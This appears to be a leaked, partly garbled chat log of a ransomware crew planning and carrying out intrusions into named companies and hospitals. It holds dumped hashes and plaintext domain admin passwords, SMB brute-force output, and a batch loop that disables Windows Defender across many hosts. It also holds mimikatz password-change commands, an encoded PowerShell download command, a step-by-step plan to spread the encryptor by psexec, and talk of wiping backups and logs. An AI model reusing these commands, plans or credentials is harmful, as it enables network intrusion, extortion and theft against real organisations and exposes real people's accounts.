SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:plain_password_hex:f5cb2f025544c2a94766e4803b8875510b977f2f069c046cecc626771c4961a698d39c6f446a4fe46a272bfb5f9a78b9d970842d974b58f2a48403be1d1ecbc091825668d8b773f8954d52f30b3dd6505d77132cfd6d617dce2c908d6387946adfe8bf650aa7c659bbc31c0edaf674104262a032bc08183e2cc4c7caa9ebd22765e00ad32582b364753e73e596eca68e0c3e752af60ab1892723adf2208563a1c5f31db349fae8603767e0153c960935b95d19349bc63207a611efd6d5b3de40aa06fcea7d935e4f304592cdf5a5e6086753011ff3266984e298dce60a2116adf7e565ab5b2087a391d1d050135c6329
SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:aad3b435b51404eeaad3b435b51404ee:8b90ea2112c039acd811d39829c113e6::
SMB 10.0.0.149 445 SCCY-17 dpapi_machinekey:0xb59c83716a5887ce1a54df9ead8d7c628c878a1c
dpapi_userkey:0x809d54b16d72c168b1d3494f4a019cd072e98e0a
SMB 10.0.0.149 445 SCCY-17 L$_SQSA_S-1-5-21-2301780395-2704588347-1769887500-1001:7b002200760065007200730069006f006e0022003a0031002c0022007100750065007300740069006f006e00730022003a005b005d007d00
SMB 10.0.0.149 445 SCCY-17 NL$KM:eb41245a05e70eff4be32dd4fb62b744805d97f265b2f5b5e9fe894e60cb46646972085540f65aa155daf995283465a06094f7ac50e540217d67ec2823eac9d9
```patykr::VANNDATA:DD52A589A49EC366:B1264E470BA6C12223F29D73CEC5CBA7:01010000000000002347910325F0D601A52C596A1B0EA71F000000000200080053004300430059000100120053004300430059002D004C005400300034000400140073006300630079002E006C006F00630061006C000300280073006300630079002D006C007400300034002E0073006300630079002E006C006F00630061006C000500140073006300630079002E006C006F00630061006C00070008002347910325F0D60106000400020000000800300030000000000000000100000000200000BFD324F14208891E2059C3E51B895DE1C760BB290B7F2031D76BB6BCA803230E0A001000000000000000000000000000000000000900120048005400540050002F0077007000610064000000000000000000```
Administrator::SCCY-MODUSLT:46EF7E198C24F087:9C88E31081E174834CE4F676257A8BDF:0101000000000000450BC1B01AF0D6010D97190CB59D7AC8000000000200080053004300430059000100120053004300430059002D004C005400300034000400140073006300630079002E006C006F00630061006C000300280073006300630079002D006C007400300034002E0073006300630079002E006C006F00630061006C000500140073006300630079002E006C006F00630061006C0007000800450BC1B01AF0D60106000400020000000800300030000000000000000000000000300000D3A08625AE17E9889BBE6E542BC8DB46D8D2A49569340F4F3F00848876BA78730A001000000000000000000000000000000000000900120048005400540050002F0077007000610064000000000000000000

```ккJoe Roebuck::SCCY:F762D890A06E7CC5:507F6F203D400680F8B9BB366B50B5C6:01010000000000000B7D3EAB1CF0D6018BF6AF46CDA62DA1000000000200080053004300430059000100120053004300430059002D004C005400300034000400140073006300630079002E006C006F00630061006C000300280073006300630079002D006C007400300034002E0073006300630079002E006C006F00630061006C000500140073006300630079002E006C006F00630061006C00070008000B7D3EAB1CF0D601060004000200000008003000300000000000000001000000002000000E7615E230D5F82F59D738ABF57A60A64A482EC9F7265E997B16C7C129D764050A001000000000000000000000000000000000000900120048005400540050002F0077007000610064000000000000000000кидайпривет! you can put a rasash for netntlm I caught some stuff in there...no?
for /f %%i in (ip.txt) do (copy wdoff.bat \\\%%i\C$\ProgramData && wmic /node:%%i process call create "cmd /c wdoff.bat")
``````
10.0.0.25
10.0.20.222
10.10.0.118
10.0.10.131
10.0.0.24
10.0.10.103
10.0.10.96
10.0.10.101
10.0.10.134
10.10.0.131
10.0.10.133
10.0.10.35
10.0.20.231
10.0.20.83
10.10.0.134
10.0.10.168
10.0.10.116
10.10.0.117
10.10.0.135
10.10.20.131
10.0.10.111
10.10.20.126
10.0.10.126
172.17.0.8
10.0.10.129
10.0.10.163
10.0.10.93
10.0.10.83
10.10.0.103
10.0.20.100
10.0.10.143
10.10.0.129
10.0.10.9
172.17.0.13
10.0.10.139
10.0.10.117
10.0.10.12
10.0.10.110
172.17.0.13
192.168.0.228
192.168.0.69
10.0.20.160
192.168.5.114
10.0.20.187
10.0.10.137
192.168.0.15
10.0.10.91
192.168.0.35
10.0.10.125

``````
NEW NTLM : 04ddcbb1734a5a868580438cb75d7c2c
``````
pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b
 
mimikatz lsadump::changentlm /server:ITC.local /user:Administrator /old:0cc0cdacd8aa7f3b06e7cdfffa909b11 /newpassword:CAKE@horse369!@@321
``make_token itc.local\br_admin CAKE@horse369!@@.``
Administrator bkupsvc br_admin
bu_veeam eagle egl_admin
egladmin egltech nk_admin
PassportalSync paustin SLEAdmin
superlogin vmware aadsync
````mimikatz lsadump::changentlm /server:sprouselaw /user:aandaservice /old:1737a8ca4966a1b4cf767232b0a4bd58 /newpassword:jackc!76DF37bd` new password for YES ``CAKE@horse369!@@321``Are we ready to start?
```
1. pinging live WS.
2. Disable WinDef
3. Uninstall starter on WS + shut down Malware.
4. Spread starter on servers (in system32), except DC. On servers with SQL we stop SQL processes manually (net stop mssqlserver) or kill them. Run the starter manually.
5. Run starter domen-wide (psexec \\* -d -s -h start.exe -accepteula -y)
6. Extinguish DC
``EA:
```
	* Username : egl_admin
	 * Domain : ITC
	 * Password : E@gle@x1s3030
```

DA:
```
	* Username : br_admin
	 * Domain : ITC
	 * Password : CAKE@horse369!@@
``? or is there another one? Use KCunZoziQUNQQoJta54VhbE7Y8PD8FPDSGWulQ3gvxuiG7SFE4tGY4mHcaYmlFZM2107.161.126.162:15127 XloTvJNB02:51 PMsimple time here it does not crush our exe
malwarebytes is installed on several servers (not BOLO) - uninstall it
everything
fresh pings and we can stop now? so what do we have here? so any list including password
sqlpassword
sa
sa1
P@ssword Try that popular passwords
there are usually no specific polices on "sa" accounts-tried to brute force "sa" accounts on skulls ?
SQL Process:
	ITC-SQL01.ITC.LOCAL 10.0.0.16
	ITCMA-SQL02.ITC.LOCAL 10.0.0.81
	ITC-SHIP01.ITC.LOCAL 10.0.0.18
	ITCMA-RDS01.ITC.LOCAL 10.0.0.8
	ITCMA-FILE01.ITC.LOCAL 10.0.0.39
	ITC-DC-SVR01.ITC.LOCAL 10.0.0.14
``Let's do a little work on the rest of them now @tl1 is coming and let's get started @Tl1 @tl2What's up? are we starting? on the rdp went to the server to look at the malware, no ill did not make any noise?it's not cloudy I'm talking about launching it does not swear at startup, check the browser does not swear at the exea so on the fact of launching the cloud will fuck up and on 90% of the boot will chop the browser on the fact of loading or on the startup?
192.168.0.227
```
  DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012
  DisplayVersion : 1.80.2.1012
  Publisher : Malwarebytes Corporation
  InstallDate : 6/13/2019 12:00:00 AM
  Architecture : x86

  DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283
  DisplayVersion : 1.13.2.283
  Publisher : Malwarebytes
  InstallDate : 10/14/2020 12:00:00 AM
  Architecture : x64
``ITCMA-FILE01
10.0.0.39
```
  DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012
  DisplayVersion : 1.80.2.1012
  Publisher : Malwarebytes Corporation
  InstallDate : 6/13/2019 12:00:00 AM
  Architecture : x86


  DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283
  DisplayVersion : 1.13.2.283
  Publisher : Malwarebytes
  InstallDate : 10/13/2020 12:00:00 AM
  Architecture : x64
yes it seems, just the opposite when? always disconnected aposto mcafee as well? it is likely to catch on the dynamics in particular, now interested in malwarebytes bad enough@tl1 do we have statistics, how do antiviruses treat our builds?[ ](https://mediaeveryone.com/group/itc-us-com?msg=gTtYwkRBNwjyaHSSC) about the build for lin question, we should clarify so if everything is ready here, put the build> In the end, what is done is done.
Yes, I just do not want to be and then there were discussions on this subject1) just look for accesses, keys, sessions in the system from the cars techs
2) check accesses and leave no traces
3) See what we need
4) clean the logs for themselves if we're talking about working with linuxxschnu means control through the scheme does not require a browser And if it had not done so would not have known NEVERThat's allThere's fucking authorization just look what is thereThat we do not watch the history of all browsers and not authorized in the LCwhy *Browser admin) what have not checked?It would not have been checked))) The point is that because they were in a hurry and did not check it, it remains a mystery50 to 50-50 it's a finger in the sky50/50 may well have been.
that there may have been key nodes in the organization in those domains?
```
There might not have been key nodes in those domains? what diap was scanned? that there might have been key nodes in the organization in those domains? what does that tell you? Can you explain without making assumptions, does having a couple more domains tell you anything? no more And this is all just your guesses Outsourced accounting yf jnenjhst scale of 20 pc? accounting and offices if not dead yet, it at least has a logistics company has been around for half a centuryhttp://www.pkgprod.com/our-history/[ ](https://mediaeveryone.com/group/matches?msg=JEX3hXd5xkpn8MLzC) but yeah lasset he has earlier``?
pwdlastset : 8/17/2020 4:36:45 PM
mailnickname : Louisad
``````
pwdlastset : 7/4/2013 2:00:27 PM
``````
[*] 10.7.20.80:445 - 10.7.20.80:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.70:445 - 10.7.20.70:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.30:445 - 10.7.20.30:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.190:445 - 10.7.20.190:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',

``a well lassset''.
whencreated : 5/20/2014 11:39:09 AM
samaccountname : Louisad
``Well, there ``couldn't be a 2020 there since
```
mdbusedefaults : True
whencreated : 7/4/2013 12:00:27 PM
name : Veeam Backup
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
usncreated : 46175
primarygroupid : 513
pwdlastset : 7/4/2013 2:00:27 PM
``````
M@tches2020!
M@tches2020!
M@tches2020!
Matches2014
matches123
matches123!
matches123!!!
m@tches123
m@tches123!
m@tches123!!!
Matches123!
Matches123!
Matches123!!!
M@tches123
M@tches123!
M@tches123!!!
Dinham2323!
Dinham2323!
Dinham2323!!!
Dinh@m2323!
Dinh@m2323!
Dinh@m2323!!!
``what was the vocabulary? I can't know, ``net accounts /dom`` don't work out... how many failed attempts were there? that's too bad``.
[-] 10.7.20.30:445 - Account lockout detected on 'Veeam', skipping this user.

``````
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches.com\Louisad:M@tches202020!
[+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.120:445 - 10.7.20.120:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches.com\Louisad:M@tches202020!!!'

``Run the relay with a command like - powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAnAGgAdAB0AHAOgvAC8AMAyADcALgAwAC4AMAAuADEAOgAzADYANQA0ADEALwAnACkA not understood about the allnailer team)[ ](https://mediaeveryone.com/group/matches?msg=NnxxkxtTqAK9jinSg) We caught a couple of users yesterday
does it make sense to run invei relay with the invei team? and give me a list of processes from her pc still scan the mercedes creeds, maybe he where an admin put + brute force users from this group `CN=sec_WorkstationLocalAdmin` try to scan that admin with a dot ``.
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: '.\Louisad:M@tches2020!
``See if there were any hooks to their skul serversDidn't you shoot/search for them? There are 3 polzak, try it-this group was brutalized? `CN=sec_WorkstationLocalAdmin` No `Microsoft SQL Server 2012 Native Client` anything from here?
Microsoft Dynamics NAV RoleTailored Client 7.1.36703.0

Microsoft Dynamics NAV Setup 7.1.36703.0

British Module for Microsoft Dynamics NAV Role Tailored Client 7.1.36703.0

Office 16 Click-to-Run Extensibility Component 16.0.11929.20606

Office 16 Click-to-Run Localization Component 16.0.11929.20606

Office 16 Click-to-Run Licensing Component 16.0.11929.20606

Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 12.0.40660

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219

HP Support Solutions Framework 12.13.42.1

Microsoft SQL Server 2012 Native Client 11.0.2100.60

Open XML SDK 2.5 for Microsoft Office 2.5.5631

ESET Endpoint Encryption 5.0.0.0

CarbonBlack Sensor 6.2.1

Jet Excel Add-In 16.1.17061.0

Microsoft System CLR Types for SQL Server 2012 11.0.2100.60

Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 12.0.40660

ESET Management Agent 7.0.577.0

Microsoft SQL Server 2005 Analysis Services ADOMD.NET 9.00.3042.00

Local Administrator Password Solution 6.2.0.0

Adobe Refresh Manager 1.8.0

Adobe Acrobat Reader DC 20.012.20048

Configuration Manager Client 5.00.8913.1000

Netop Remote Control Host 12.83.20175

Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 12.0.40660

                                                                                  

Google Update Helper 1.3.35.451

Microsoft Report Viewer 2012 Runtime 11.1.3010.3

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) 10.0.50330

Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 12.0.40660

FortiClient 6.0.9.0277

Microsoft Policy Platform 68.1.1010.0
``Try set .it's default as .so it's default as WORKSTATION maybe? I didn't specify any domain just it says here with "." and there with workstation ``
[+] 10.5.6.21:445 - 10.5.6.21:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.4.1.113:445 - 10.4.1.113:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.7.226:445 - 10.1.7.226:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.6.6:445 - 10.1.6.6:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.7.224:445 - 10.1.7.224:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.7.192:445 - 10.1.7.192:445 - Success: '.\conn-selmer:&Green27!'
``[ ](https://mediaeveryone.com/group/matches?msg=RjYLyv8W6SpZtN3L2) but with .[ ](https://mediaeveryone.com/group/matches?msg=wsgm4pkMDKaiXsNv3) but with '.''?
Pinging UKHECSLT3028.matches.com [10.20.4.4] with 32 bytes of data:
Request timed out.
Request timed out.

``This admin was not enabled at all on the Mercedes, I gave him this passwordUKHECSLT3028 and it is visible?[ ](https://mediaeveryone.com/group/matches?msg=WXdmjEJiTx32bPXgy) and with these accesses checked?
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches\Louisad:M@tches2020!
[+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches\Louisad:M@tches202020!!!'

``She didn't have winscp,ftp,putty,teamviewer...? then so far all the scans that have access and open 445 just hung file 0b and that's it ``regression-app-portal.matcheslocal.com [10.5.53.111]``what hosts did you check on ms17? did you check all the trusts? i.e. you didn't try on ms17? and what hosts did you check? did you only scan 2003? did you add his password to the brute force dictionary for yes? did you write "." did you write workstation? and with the admin account i assume the same situation? for the test do a couple of hosts, ok
try it with the domain in this case you found it registered outside the domain, which is strange he may be registered as LA with a domain account somewhere) if you put the domain, it is clear he will write Success everywhere) we scanned the local admins in the domain put "." or so I do not understand it and did not write in Conn-selmer, and gave out with the admin did not writeJust these should be his valid credentials and it everywhere to be as Success without an admina you when you scanned the domain did not write?aha)ah, well he's not an admin there didn't you go there?[ ](https://mediaeveryone.com/group/matches?msg=MbnvaHGsoKr8b6P2o) did you check this account[ ](https://mediaeveryone.com/group/matches?msg=NjWhmgmX7wnJK2TL3) did you check other hosts as LA?[ ](https://mediaeveryone.com/group/matches?msg=T8c6EfFFgKzH28gbc) and what's the polzak and what kind of machine? and the sloits about exec want SA with the password they sql 2017 stands brute force -brute force
sploit -dav in principle and on our deck on their network, too it's about scan from the deck under vpnomsploits by? on her machine - yes so we have tried everything? just wait?) she computer reboot rarely (27 last time), and go on rdp and turn it on the vpn only option that we can do with this machineNo, + maximum palevostiU on her pc is enabled NLA - on rdp does not allow to connect
We disabled it through the registry, but we have to reboot the computer for the changes to take effect.
if we reboot her computer and after the reboot will hang authorization window - our session will not come? mbh on the use of pshno I did not stay long and did not have time to review something by the way when the load tpsh ran, I just what just try to respawn or do not risk to rdp to climb?in the cob the session sagged, in the tpsh not responding why strange? rights just do not exist ... strangeadmin's balloon is only on the current machine ``
[*] Parsed 39 computer objects.
Shares for AD-C1:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		IPC$
	[--- Listable Shares ---]
		NETLOGON SYSVOL
Shares for mkemds:
	[--- Unreadable Shares ---]
		ADMIN$
		AustinRad
		C$
		D$
		IPC$
		MK
		T$
		Users

Shares for Expectations:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Expectations
		IPC$
		Quest
		Users
		W$

Shares for MKSQL:
	[--- Unreadable Shares ---]
		ADMIN$
		B$
		C$
		D$
		G$
		H$
		I$
		IPC$
		J$

Shares for KNorton:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		IPC$
		Norton
		Y$

Shares for PremierCentral:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		CHI-EF
		D$
		IPC$
		PremierCentral
		Y$

Shares for Snell-Hargrove:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Hargrove
		IPC$
		Y$

Shares for broker7:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Faxes
		IPC$
		Users
		Y$

Shares for Garland:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Garland
		IPC$
		Users
		Y$
	[--- Listable Shares ---]
		print$
Shares for ExpressFamily:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		expressfamily
		IPC$
		users
		Y$

Shares for TCT:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		IPC$
		TCT
		Users
		Y$

Shares for NGupta:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Images
		IPC$
		Users
		Y$
	[--- Listable Shares ---]
		print$
Shares for FamilyDocs:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		FamilyDocs
		IPC$
		Users
		Y$

Shares for EssentialFamily:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Essential Family
		Images
		IPC$
		Users
		Y$
	[--- Listable Shares ---]
		print$
Shares for SQL-C1:
	[--- Unreadable Shares ---]
		admin
		ADMIN$
		B$
		C$
		D$
		E$
		F$
		G$
		H$
		I$
		IPC$
		K$
		L$
		M$
		Midwest
		N$
		O$
		P$
		Q$
		R$
		S$
		T$
		U$
		V$
		W$
		X$
		Y$
		Z$

Shares for FamilyMedical:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		FMA
		IPC$
		Scans
		Users
		Y$

Shares for healdton:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ Healdton Users Y$
Shares for Broker5:
	[--- Unreadable Shares ---]
		ADMIN$
		Auburn Pain
		C$
		Camellia
		D$
		IPC$
		Medicos
		Users
		Y$

Shares for MHG-FAX-DT:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		IPC$

Shares for FDFHFAXIN:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		IPC$

Shares for WORKSTATION-209:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		IPC$

Shares for MKFAX-SERVER:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		front
		HL7
		IPC$
	[--- Listable Shares ---]
		print$

``Serious policies by the way.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 8
Length of password history maintained: 2
Lockout threshold: 5
Lockout duration (minutes): 3
Lockout observation window (minutes): 3
Computer role: PRIMARY

```:zany_face:``we've been exposedfinitalacomedywithdns cache in the sitbelt was``.
  Entry : wikibros.com
  Name : wikibros.com
  Data : 23.106.160.61

  Entry : wideio.com
  Name :
  Data :

  Entry : wideio.com
  Name : wideio.com
  Data : 23.19.227.186
The ``check #general``.
 Get-PSReadLineOption
The term 'Get-PSReadLineOption' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
``You're welcome to see history file path or something like that after execution. Can you remind me the command to clean the psh, please? ok, ok, work until you get to the psh?
```
C:\Users\Healdton.IT\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.zirmed.com/,https://login.zirmed.com/ui/Login/Failed,2/20/2020 8:46:37 AM,13226683597880246,tpchcclay,PCH@2019!
No kerbs, no rubus (kerb, asrep), no invoc kerb found anything can you continue to report the results of the workahahahahahahais now will remove the kerbsNet-GPPPassword did not give anything just reported the situation I did not say that there is nothing and do nothing but the car in the domain and it opens a lot of vectors current car - the server, but I am not LA there` ``
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
dsechrist kkohl
```
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
dsechrist kkohl
```
```
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
dsechrist
STG-HEALTHCARE\Domain Admins

``I'm looking in the gui, there is a place to paste, but where do I take it? Maybe the name of the item is not obvious? Well, look directly through the gui implementation of Sharpview there
I can't remember the parameter transfer(?
I don't know how to do it...[ ](https://mediaeveryone.com/direct/Rmne8eAkiu37dhm5zhjejta5RxgeJ37xnE?msg=6KQLTRAjjP6STB9m5) it's not in the domain, it's in the .cna gueta where you can set it, just poke the menu in the sharpview gui and it will show you the right string with the creds... why? For sharview I found
```
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
```
but how to use this from a coba is not clear at all...NON-DOMAIN
```
SCCY-MODUSLT
SCCY-PRODUCTION
VANNDATA
DESKTOP-GP0L2NF
DESKTOP-15BLUKS
DESKTOP-TEODH7E
0EA78803
The second one has a lot of links to shared resources. In general, these satellites are more like filewashing sites. the one that has the craps has a capacity of 1Tb what is there at all?
 History (VDSADMIN):

       https://huntress-installers.s3.amazonaws.com
       https://huntress-installers.s3.amazonaws.com
       https://huntress-installers.s3.amazonaws.com/0.11.64.exe?response-content-disposition=attachment%3B%20filename%3DHuntressInstaller.exe&response-content-type=application%2Foctet-stream&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARAAI7IUXLVVVG3PJ%2F20210125%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210125T200124Z&X-Amz-Expires=60&X-Amz-SignedHeaders=host&X-Amz-Signature=b49c8f6de6b20ecacddf305a5163508fa53aa16718c22bdb7c249eac8521511eHuntressInstaller.exemoc.swanozama.3s.srellatsni-ssertnuh
``````
User: sccyadmin - IP Address: 10.0.0.6
User: VannData - IP Address: 10.1.4.205
``This is us between us and where?
10.1.4.175
admin:vanndatashmamdata
``NAS
```
10.1.4.175:80

10.0.0.51:80 datto control center

10.0.0.4:80
``ts sccy-fs mfgwin10-1
http://10.0.0.200:8000/,http://10.0.0.200:8000/,11/16/2020 10:39:56 AM,13250014796840092,,
http://10.0.0.202/,http://10.0.0.202/,12/2/2020 3:53:53 PM,13251416033085523,,
http://10.0.0.21/NETGEAR R8000P,http://10.0.0.21/,1/11/2021 4:01:07 PM,13254872467540386,,

``````
	 * Username : vdsadmin
	 * Domain : SCCY
	 * Password : T@ng0D0wn!
```
```
User : vdsadmin - IP Address : 10.0.0.75
User: VannData - IP Address: 10.0.0.5
? ``want to get the account from here.huntress.i give you a link to the softs QR Go to the link What kind of protection? a conspiracy of lokers it is protection from lokers see we are not the first)) they found on their computer, what is it?
```

	 * Username : JamesD
	 * Domain : SCCY.LOCAL
	 * Password : Jd07101995

	 * Username : toy
	 * Domain : SCCY.LOCAL
	 * Password : 2Pink4u123

	 * Username : karend
	 * Domain : SCCY.LOCAL
	 * Password : Karrie10!

	 * Username : qc
	 * Domain : SCCY
	 * Password : secure4qc

	 * Username : davidd
	 * Domain : SCCY.LOCAL
	 * Password : Monksman1!
``YES``
```
InstallA NOC_HelpDesk Passportal_Srvc
VannData vdsadmin

```
EA
```
InstallA VannData vdsadmin
```
SA
```
InstallA sccyadmin
``It's not certain, but it's very likely that they are not available at third-party services[ ](https://mediaeveryone.com/group/sccy-com?msg=2CqXrpzsQwqiizHbN) ?waiting for the list of external backups yet to closeuser8user3I'm waiting for the cods from nasovtut to close today ?
```
3MCDIDAT.main.crispregional.org
Allscripts_PM.main.crispregional.org
ATComm.main.crispregional.org
Bepoz.main.crispregional.org
Cintas.main.crispregional.org
CorepointApp01.main.crispregional.org
CorepointApp02.main.crispregional.org
CorepointTest.main.crispregional.org
CRHS-Dragon.main.crispregional.org
CRHS-PRINT.main.crispregional.org
crhs-security.main.crispregional.org
CRHSBACKUP.main.crispregional.org
CRHSvCenter.main.crispregional.org
CRHSViewCon02.main.crispregional.org
CRHSViewExtCon.main.crispregional.org
CRHSViewTS4.main.crispregional.org
CRHSViewTS5.main.crispregional.org
CRHSViewTS6.main.crispregional.org
CRRHPUMP1.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRRHPUMP3.main.crispregional.org
HISCODER.main.crispregional.org
HPDeviceManager.main.crispregional.org
HRBADGE.main.crispregional.org
Intranet.main.crispregional.org
Intranet.main.crispregional.org
IT-ADMIN.main.crispregional.org
IT-Info.main.crispregional.org
Syslog.main.crispregional.org
Lansweeper.main.crispregional.org
MedManager.main.crispregional.org
MedNet.main.crispregional.org
NEXO.main.crispregional.org
NovaNet.main.crispregional.org
ProvationApp.main.crispregional.org
ProvationDB.main.crispregional.org
PYXIS-APP.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmLive.main.crispregional.org
QMS.main.crispregional.org
ScriptSvr01.main.crispregional.org
SPFoundation.main.crispregional.org
TELCOR.main.crispregional.org
Trinisys-APP.main.crispregional.org
Trinisys-DB.main.crispregional.org

``Let's take our time to prepare and close down little by little, how much is that? Well, shall we start little by little? https://www.lets-talk-about.tech/2018/03/rubrik-reset-brik-to-factory-default.htmlпроверяем) it's a little early[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=bYvaQAP93d3DLXhm6) 206.221.188.106:38824then close down little by little, the servers are still being restored via rubrik
I propose to reset the passwords on the cx, erase rubric and encrypt all over again
They restore everything from it, and the storage of backups there too
but there's a problem in the form of ``
anti_ransom.exe
``` - put on some servers.
seems to bite, cuts the launch dll.
the idea is to go around the rdp and remove or disconnect the rest of the televisa last session fell off today - tv, yesterday's nets from the vpn and the current @user3[ ](https://mediaeveryone.com/channel/general?msg=gCK9C9WQDpE52k8pR) Well, just ate lunch rolls.the question was where are we wasting our time in general, I'm not talking about this network in a network where 21k npc are the quietest waysshaprhoud\accesses to shampeople\shaprhoud\accesses to shampeople\gather comps and servers where to bruteforce on lato tell me differentlywhat other info are you spending time while hell is gathering?) did not have time (rubeus I always run after collecting information + where are the hashes? manually gather would be quieterwhy tulchaindomainDKnu always started with this (YES LA EA adinfo) the question is why the fuck do I know that this is from tulchainaand I know what or how it is connected, but after the addfind files and the archive started downloading the session died Why use it?


[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
333301283

[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
398533948

[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
437262015

``Why is it definitely dead now (-from mathem.local there are still live sessions? It's too big if you work with it don't fuck it up```

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
bbt0097 reconwindomp suQARSp_admin
suWATprod
The command completed successfully.

``I spammed a new one, try it yourself there is only 1 session at all do any command and dies spamming session banally ask YES and the session dies everything is bad, just terrible, does not give anything to do all who have problems go to this coboo and work from there ``
flexzap.com
``````
192.254.78.106:30504
sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins
``cannot use eleveits@tl1
In the new coba from the user does not give anything to do
```
[-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740
[-] Could not connect to pipe: 2
``hi:space_invader:HiHiHiHiHi, there was one this morning
anyone still have the files? you need to know how to do this.
it's the only method to dump chrome without a session on the machine we dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file
That's not a backup, huh?
I wonder what clupload has to do with it... Whatever, so do it.
and offline solved the problem I threw how to pull chrome through DPAPI found a polzak masterkey that goes to malwarenu to decrypt the DPAPI content chrome in sharp chrome master-key can somehow work? maybe from it a folder OutLook I don't know
it doesn't say anything...and sitbell search for credentials came up login credentials.jpg
```
C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE
